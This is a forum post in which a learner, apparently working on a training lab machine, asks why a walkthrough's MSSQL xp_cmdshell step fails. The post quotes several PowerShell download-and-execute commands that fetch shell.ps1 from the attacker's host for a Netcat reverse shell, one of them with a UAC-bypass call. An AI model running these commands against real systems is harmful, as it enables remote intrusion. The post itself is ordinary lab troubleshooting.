Hello everyone,
I am hoping someone can point me in the right direction here because the instructions in the walkthrough do not work.
I am trying to execute the command to pull down shell.ps1. I have the Python HTTP server running, as well as Netcat on port 443.
When I try to use any form of the PowerShell’s DownloadString command, the mssqlclient.py console will either hang, get into an unusuable state where entering any command results in it not being executed (just get a new line), or an error from PowerShell. I once got it to give an error about antivirus, however I cannot seem to reproduce that.
I have tried the following:
-From the walkthough
- xp_cmdshell "powershell “IEX (New-ObjectNet.WebClient).DownloadString("http://[MY_IP]/shell.ps1");”
Result: no connection to Python webserver, console goes into state where it won’t execute commands
-Adding a missing double quote at the end
xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString("http://[MY_IP]/shell.ps1");””
Result: no connection to Python webserver, console goes into state where it won’t execute commands
Another command I found for downloading with PowerShell
xp_cmdshell powershell.exe -exec bypass -C “IEX (New-Object Net.WebClient).DownloadString("http://[MY_IP]/shell.ps1");Invoke-BypassUAC -Command "start powershell.exe"”
Result: no connection to Python webserver, console goes into state where it won’t execute commands
I have also tried different combinations of single quotes, double quotes, extra slashes (\ in place of a single ) . I have also tried resetting the machine, enabling/disabling ufw on my Kali virtual machine, and verified my IP address is correct. NOTHING WORKS.
I have had success using this command:
xp_cmdshell powershell -command {“IEX echo 1”}
Result:
IEX echo 1
NULL
And by success, I mean the mssqlclient.py console is still usable after executing the command. If I try replacing the echo 1 part , with some form of Web-Client/Download-String I get the problems I have already described.
I am at a loss of how to go forward here. This is supposed to be a “very easy” machine, yet I do not see what I am missing. Am I wrong in assuming that there should be a direct logical path and the walkthrough document should provide this? Is there some other part of this challenge that I lack the experience to know?